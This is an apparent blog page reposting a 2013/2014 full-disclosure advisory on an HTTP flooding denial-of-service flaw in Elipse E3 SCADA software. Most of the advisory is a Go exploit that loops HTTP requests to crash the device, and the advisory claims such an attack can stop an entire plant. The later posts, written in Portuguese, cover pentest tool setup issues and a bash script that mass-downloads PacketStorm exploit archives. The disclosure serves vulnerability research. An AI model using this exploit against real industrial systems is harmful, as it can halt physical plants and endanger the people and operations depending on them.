VSLA Security Advisory FIRE-SCADA-DOS-2013-001- Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.

http://seclists.org/fulldisclosure/2014/Jul/69

Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC. From: Mauro Risonho de Paula Assumpção
Date: Tue, 15 Jul 2014 12:18:35 -0300

VSLA Security Advisory FIRE-SCADA-DOS-2013-001:
Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.

LEVEL: EXTREME
In our tests authorized by the customer, we can stop the entire plant.

Published: 10/29/2013
Version: 1.0

Vendor: Elipse (http://www.elipse.com.br/port/index.aspx)
Product: Elipse E3 (http://www.elipse.com.br/port/e3.aspx)
Version affected: 3.x and prior

Product description:
Elipse E3 is a proprietary software.
The E3 is a system of supervision and control processes designed to meet
the current requirements of connectivity, flexibility and reliability,
making it ideal for use in critical systems (SCADA PLC).

Credit: Mauro Risonho de Paula Assumpção aka firebits

Finding 1: Http DoS Requests Flooding Crash Device Vulnerabilities by
‘index.html’ page.
CVE: CVE-2011-4899

Proof of Concept:
Exploit:

// Exploit Http DoS Request for SCADA ATTACK Elipse 3
// Mauro Risonho de Paula Assumpção aka firebits
// mauro.risonho () gmail com
// 29-10-2013 11:42
// Hard lock Dll crash in Windows 2003 SP2 + 20 requests connections
// exploit in Golang (golang.com) C Google
// Exploit Devel in Fedora:
// sudo yum install golang -y
// go run Http-DoS-Request-SCADA-ATTACK-rev1.go

// Exploit Http-DoS-Request-SCADA-ATTACK-rev1.go
package main

import (
“fmt”
“io/ioutil”
“log”
“net/http”
)

func main() {
count := 1
// fmt.Println (“”)
// fmt.Println (” _____.__ ___. .__ __ “)
// fmt.Println (” _/ ____\__|______ ____\_ |__ |__|/ |_ ______ “)
// fmt.Println (” \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ “)
// fmt.Println (” | | | || | \/\ ___/| \_\ \ || | \___ \ “)
// fmt.Println (” |__| |__||__| \___ >___ /__||__| /____ > “)
// fmt.Println (” \/ \/ \/ “)
// fmt.Println (” bits on fire. “)
fmt.Println (“Exploit Http DoS Request for SCADA ATTACK Elipse 3″)
fmt.Println (“Mauro Risonho de Paula Assumpção aka firebits”)
fmt.Println (“29-10-2013 11:42″)
fmt.Println (“mauro.risonho () gmail com”)
fmt.Println (“Hard lock Dll crash in Windows 2003 SP2 + “)
fmt.Println (“20 requests connections per second”)

for {
count += count
//set ip http://192.168.0.1:1681/index.html ->
// Elipse 3 http://

fmt.Println (“Exploit Http DoS Request for SCADA ATTACK Elipse 3″)
fmt.Println (“Mauro Risonho de Paula Assumpção aka firebits”)
fmt.Println (“29-10-2013 11:42″)
fmt.Println (“mauro.risonho () gmail com”)
fmt.Println (“Hard lock Dll crash in Windows 2003 SP2 + “)
fmt.Println (“20 requests connections”)

fmt.Println (“Connected Port 1681…Testing”)
fmt.Println (“Counter Loops: “, count)

res, err := http.Get(“http://192.168.0.1:1681/index.html”;)
if err != nil {
log.Fatal(err)
}
robots, err := ioutil.ReadAll(res.Body)
res.Body.Close()
if err != nil {
log.Fatal(err)
}
fmt.Printf(“%s”, robots)
}
}

Crash 20 Requests Paralels

Vendor Response:
Due to the fact that the component in question is an installation script,
the vendor has stated that the attack surface is too small to warrant
a fix:

“We would be possible for us to communicate the details of the test, so
we can arrange a hotfix.”

VSLA Virtual Security Labs Anywhere recommends installing the hotfix,
hardware/software to be putting in a production environment.

Remediation Steps:
No official fix for these issues will be released for the Elipse.
However, administrators can mitigate these issues defining rules within
a web application firewall (WAF) solution.

Vendor Communication Timeline:
10/24/2013 – Vulnerability disclosed
10/29/2013 – Confirmation to release vulnerabilities
? – Advisory published

References
1. http://www.elipse.com.br/port/e3.aspx

About VSLA Virtual Security Labs Anywhere:
VSLA Virtual Security Labs Anywhere is a research blog on security
the information.
firebitsbr.wordpress.com

Disclaimer:
The information provided in this advisory is provided “as is” without
warranty of any kind. VSLA Virtual Security Labs Anywhere disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. In no event shall
VSLA Virtual Security Labs Anywhere or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
VSLA Virtual Security Labs Anywhere or its suppliers have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.

@firebitsbr

impacket – debian 7 netinstall

Erro:

python /usr/local/bin/rdp_check.py <ip>
Traceback (most recent call last):
File “/usr/local/bin/rdp_check.py”, line 23, in <module>
from impacket.spnego import *
ImportError: No module named spnego

Instalar os packages:
easy_install urllib2_kerberos
easy_install httpie-negotiate
easy_install pyOpenSSL

Executar
python /usr/local/bin/rdp_check.py <ip>
Impacket v0.9.11 – Copyright 2002-2014 Core Security Technologies

[*] Access Granted

@firebitsbr

OWASP OWTF Version: 0.45.0, Release: Winter Blizzard + Kali = Error hoppy-1.8.1

Olá.

Venho participando do projeto OWASP OWTF e achando vários bugs e issues e sugerindo novas features.

Em outro post, vou falar mais sobre esse framework OWASP OWTF, mas por enquanto:

python owtf.py http://www.xxx.com

__ ___
/\ \__ /’___\
___ __ __ _\ \ ,_\/\ \__/
/ __`\/\ \/\ \/\ \ \ \/\ \ ,__\
/\ \_\ \ \ \_/ \_/ \ \ \_\ \ \_/
\ \____/\ \___x___/’\ \__\\ \_\
\/___/ \/__//__/ \/__/ \/_/

OWTF Version: 0.45.0, Release: Winter Blizzard

[*] Loading framework please wait..
[*] Loading Config from: /root/owtf/profiles/general/default.cfg ..
[*] Loading Resources from: /root/owtf/profiles/resources/default.cfg ..
[*] Loading net Plugin Order from: /root/owtf/profiles/net_plugin_order/default.cfg ..
[*] Loading web Plugin Order from: /root/owtf/profiles/web_plugin_order/default.cfg ..
[*] The IP address for http://www.xxx.com is: ‘x.x.x.x’
[*] The IP address for http://www.xxx.com is: ‘x.x.x.x’
[*] WARNING: Tool path not found for: /root/owtf/tools/restricted/hoppy-1.8.1/hoppy-1.8.1
[*]
[*] WARNING!!!: 1 tools could not be found. Some suggestions:
[*] – Define where your tools are here: /root/owtf/profiles/general/default.cfg
Continue anyway? [Y/n]

============================================================

Sugestion:

cd /root/owtf/tools/restricted/hoppy-1.8.1/hoppy-1.8.1

wget –no-check-certificate http://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2; bunzip2 *; tar xvf *; rm -f *.tar 2> /dev/null

============================================================

Error:

wget http://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2; bunzip2 *; tar xvf *; rm -f *.tar 2> /dev/null
–2014-06-03 18:09:52– http://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2
Resolving labs.portcullis.co.uk (labs.portcullis.co.uk)… 77.75.105.66
Connecting to labs.portcullis.co.uk (labs.portcullis.co.uk)|77.75.105.66|:80… connected.
HTTP request sent, awaiting response… 301 Moved Permanently
Location: https://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2 [following]
–2014-06-03 18:09:53– https://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2
Connecting to labs.portcullis.co.uk (labs.portcullis.co.uk)|77.75.105.66|:443… connected.
ERROR: The certificate of `labs.portcullis.co.uk’ is not trusted.
bunzip2: Can’t open input file *: No such file or directory.
tar: *: Cannot open: No such file or directory

@firebitsbr

Mudando IP e Porta no Dradis Server para Kali

Se você for usar Dradis (http://dradisframework.org/), geralmente você irá procurar na documentação oficial do projeto (http://dradisframework.org/documentation.html), para mudar alguma configuração.

O problema é quando é algo totalmente modificado (via git), com por exemplo a equipe do Kali faz.

Então, ou você pergunta no forum em busca de alguém que já passou por isso, ou faz como eu fiz, procura no próprio código do Dradis dentro do Kali.

E deu certo. Vou fazer novas revisões deste post no futuro, mas para não perder tempo, vejam:

Essa Gem está dando erro, mas sem problemas por enquanto:

Gem Error
/usr/lib/dradis/server/vendor/bundle/ruby/1.9.1/gems/RedCloth-4.2.8/lib/redcloth.rb:10: Use RbConfig instead of obsolete and deprecated Config.

Start Server
/etc/init.d/dradis start

Abrir com VIM em:
/usr/lib/dradis/server/script/rails

#!/usr/bin/env ruby
# vim /usr/lib/dradis/server/script/rails
# This command will automatically be run when you run “rails” with Rails 3 gems i$

require ‘rubygems’
require ‘rails/commands/server’
require ‘rack’
require ‘webrick’
require ‘webrick/https’

module Rails
class Server 8080,
#:Port => 3004,
#:Host => “127.0.0.1”,
:Host => “192.168.0.22”,
# hopefully this closes #17
# ref: http://stackoverflow.com/questions/1156759/
:DoNotReverseLookup => nil,
:environment => (ENV['RAILS_ENV'] || “development”).dup,
:daemonize => false,
:debugger => false,
:pid => File.expand_path(“tmp/pids/server.pid”),
:config => File.expand_path(“config.ru”),
:SSLEnable => true,
:SSLVerifyClient => OpenSSL::SSL::VERIFY_NONE,
:SSLPrivateKey => OpenSSL::PKey::RSA.new(
File.open(File.expand_path( ‘../../config/ssl/server.key.i$
:SSLCertificate => OpenSSL::X509::Certificate.new(
File.open(File.expand_path(‘../../config/ssl/server.crt’, $
:SSLCertName => [["CN", WEBrick::Utils::getservername]]
})
end
end
end

Mudar de:

:Port => 3004,
:Host => “127.0.0.1”,

Para (ou IP ou porta que você desejar)

:Port => 8081,
:Host => “192.168.0.10”,

Salvar o arquivo

Parar o server:
/etc/init.d/dradis stop

Subir o server novamente
/etc/init.d/dradis start

Pronto! Agora é só testar numa VM ou na sua própria máquina.

@firebitsbr

Script Shell “Quick, N00b and Dirty” para Download de exploits YY-MM do PacketStorm

Vou revisar e melhorar depois, mas precisei fazer bem simples e rápido.

#!/bin/bash
# Mauro Risonho de Paula Assumpção AKA firebits
# Auto Downloader exploits PackerStormSecurity.net
# Rev01

echo “Year 2005 – packetstormsecurity”
echo “…downloading”
wget http://dl.packetstormsecurity.net/0501-exploits/0501-exploits.tgz
wget http://dl.packetstormsecurity.net/0502-exploits/0502-exploits.tgz
wget http://dl.packetstormsecurity.net/0503-exploits/0503-exploits.tgz
wget http://dl.packetstormsecurity.net/0504-exploits/0503-exploits.tgz
wget http://dl.packetstormsecurity.net/0505-exploits/0505-exploits.tgz
wget http://dl.packetstormsecurity.net/0506-exploits/0506-exploits.tgz
wget http://dl.packetstormsecurity.net/0507-exploits/0507-exploits.tgz
wget http://dl.packetstormsecurity.net/0508-exploits/0508-exploits.tgz
wget http://dl.packetstormsecurity.net/0509-exploits/0509-exploits.tgz
wget http://dl.packetstormsecurity.net/0510-exploits/0510-exploits.tgz
wget http://dl.packetstormsecurity.net/0511-exploits/0511-exploits.tgz
wget http://dl.packetstormsecurity.net/0512-exploits/0512-exploits.tgz

echo “Year 2006 – packetstormsecurity”
echo “…downloading”
wget http://dl.packetstormsecurity.net/0601-exploits/0601-exploits.tgz
wget http://dl.packetstormsecurity.net/0602-exploits/0602-exploits.tgz
wget http://dl.packetstormsecurity.net/0603-exploits/0603-exploits.tgz
wget http://dl.packetstormsecurity.net/0604-exploits/0603-exploits.tgz
wget http://dl.packetstormsecurity.net/0605-exploits/0605-exploits.tgz
wget http://dl.packetstormsecurity.net/0606-exploits/0606-exploits.tgz
wget http://dl.packetstormsecurity.net/0607-exploits/0607-exploits.tgz
wget http://dl.packetstormsecurity.net/0608-exploits/0608-exploits.tgz
wget http://dl.packetstormsecurity.net/0609-exploits/0609-exploits.tgz
wget http://dl.packetstormsecurity.net/0610-exploits/0610-exploits.tgz
wget http://dl.packetstormsecurity.net/0611-exploits/0611-exploits.tgz
wget http://dl.packetstormsecurity.net/0612-exploits/0612-exploits.tgz

echo “Year 2007 – packetstormsecurity”
echo “…downloading”
wget http://dl.packetstormsecurity.net/0701-exploits/0701-exploits.tgz
wget http://dl.packetstormsecurity.net/0702-exploits/0702-exploits.tgz
wget http://dl.packetstormsecurity.net/0703-exploits/0703-exploits.tgz
wget http://dl.packetstormsecurity.net/0704-exploits/0703-exploits.tgz
wget http://dl.packetstormsecurity.net/0705-exploits/0705-exploits.tgz
wget http://dl.packetstormsecurity.net/0706-exploits/0706-exploits.tgz
wget http://dl.packetstormsecurity.net/0707-exploits/0707-exploits.tgz
wget http://dl.packetstormsecurity.net/0707-exploits/0707-exploits.tgz
wget http://dl.packetstormsecurity.net/0709-exploits/0709-exploits.tgz
wget http://dl.packetstormsecurity.net/0710-exploits/0710-exploits.tgz
wget http://dl.packetstormsecurity.net/0711-exploits/0711-exploits.tgz
wget http://dl.packetstormsecurity.net/0712-exploits/0712-exploits.tgz

echo “Year 2008 – packetstormsecurity”
echo “…downloading”
wget http://dl.packetstormsecurity.net/0801-exploits/0801-exploits.tgz
wget http://dl.packetstormsecurity.net/0802-exploits/0802-exploits.tgz
wget http://dl.packetstormsecurity.net/0803-exploits/0803-exploits.tgz
wget http://dl.packetstormsecurity.net/0804-exploits/0803-exploits.tgz
wget http://dl.packetstormsecurity.net/0805-exploits/0805-exploits.tgz
wget http://dl.packetstormsecurity.net/0806-exploits/0806-exploits.tgz
wget http://dl.packetstormsecurity.net/0807-exploits/0807-exploits.tgz
wget http://dl.packetstormsecurity.net/0808-exploits/0808-exploits.tgz
wget http://dl.packetstormsecurity.net/0809-exploits/0809-exploits.tgz
wget http://dl.packetstormsecurity.net/0810-exploits/0810-exploits.tgz
wget http://dl.packetstormsecurity.net/0811-exploits/0811-exploits.tgz
wget http://dl.packetstormsecurity.net/0812-exploits/0812-exploits.tgz

echo “Year 2009 – packetstormsecurity”
echo “…downloading”
wget http://dl.packetstormsecurity.net/0901-exploits/0901-exploits.tgz
wget http://dl.packetstormsecurity.net/0902-exploits/0902-exploits.tgz
wget http://dl.packetstormsecurity.net/0903-exploits/0903-exploits.tgz
wget http://dl.packetstormsecurity.net/0904-exploits/0903-exploits.tgz
wget http://dl.packetstormsecurity.net/0905-exploits/0905-exploits.tgz
wget http://dl.packetstormsecurity.net/0906-exploits/0906-exploits.tgz
wget http://dl.packetstormsecurity.net/0907-exploits/0907-exploits.tgz
wget http://dl.packetstormsecurity.net/0908-exploits/0908-exploits.tgz
wget http://dl.packetstormsecurity.net/0909-exploits/0909-exploits.tgz
wget http://dl.packetstormsecurity.net/0910-exploits/0910-exploits.tgz
wget http://dl.packetstormsecurity.net/0911-exploits/0911-exploits.tgz
wget http://dl.packetstormsecurity.net/0912-exploits/0912-exploits.tgz

echo “Year 2010 – packetstormsecurity”
echo “…downloading”
wget http://dl.packetstormsecurity.net/1001-exploits/1001-exploits.tgz
wget http://dl.packetstormsecurity.net/1002-exploits/1002-exploits.tgz
wget http://dl.packetstormsecurity.net/1003-exploits/1003-exploits.tgz
wget http://dl.packetstormsecurity.net/1004-exploits/1003-exploits.tgz
wget http://dl.packetstormsecurity.net/1005-exploits/1005-exploits.tgz
wget http://dl.packetstormsecurity.net/1006-exploits/1006-exploits.tgz
wget http://dl.packetstormsecurity.net/1007-exploits/1007-exploits.tgz
wget http://dl.packetstormsecurity.net/1008-exploits/1008-exploits.tgz
wget http://dl.packetstormsecurity.net/1009-exploits/1009-exploits.tgz
wget http://dl.packetstormsecurity.net/1010-exploits/1010-exploits.tgz
wget http://dl.packetstormsecurity.net/1011-exploits/1011-exploits.tgz
wget http://dl.packetstormsecurity.net/1012-exploits/1012-exploits.tgz

echo “Year 2011 – packetstormsecurity”
echo “…downloading”
wget http://dl.packetstormsecurity.net/1101-exploits/1101-exploits.tgz
wget http://dl.packetstormsecurity.net/1102-exploits/1102-exploits.tgz
wget http://dl.packetstormsecurity.net/1103-exploits/1103-exploits.tgz
wget http://dl.packetstormsecurity.net/1104-exploits/1103-exploits.tgz
wget http://dl.packetstormsecurity.net/1105-exploits/1105-exploits.tgz
wget http://dl.packetstormsecurity.net/1106-exploits/1106-exploits.tgz
wget http://dl.packetstormsecurity.net/1107-exploits/1107-exploits.tgz
wget http://dl.packetstormsecurity.net/1108-exploits/1108-exploits.tgz
wget http://dl.packetstormsecurity.net/1109-exploits/1109-exploits.tgz
wget http://dl.packetstormsecurity.net/1110-exploits/1110-exploits.tgz
wget http://dl.packetstormsecurity.net/1111-exploits/1111-exploits.tgz
wget http://dl.packetstormsecurity.net/1112-exploits/1112-exploits.tgz

echo “Year 2012 – packetstormsecurity”
echo “…downloading”
wget http://dl.packetstormsecurity.net/1201-exploits/1201-exploits.tgz
wget http://dl.packetstormsecurity.net/1202-exploits/1202-exploits.tgz
wget http://dl.packetstormsecurity.net/1203-exploits/1203-exploits.tgz
wget http://dl.packetstormsecurity.net/1204-exploits/1203-exploits.tgz
wget http://dl.packetstormsecurity.net/1205-exploits/1205-exploits.tgz
wget http://dl.packetstormsecurity.net/1206-exploits/1206-exploits.tgz
wget http://dl.packetstormsecurity.net/1207-exploits/1207-exploits.tgz
wget http://dl.packetstormsecurity.net/1208-exploits/1208-exploits.tgz
wget http://dl.packetstormsecurity.net/1209-exploits/1209-exploits.tgz
wget http://dl.packetstormsecurity.net/1210-exploits/1210-exploits.tgz
wget http://dl.packetstormsecurity.net/1211-exploits/1211-exploits.tgz
wget http://dl.packetstormsecurity.net/1212-exploits/1212-exploits.tgz

@firebitsbr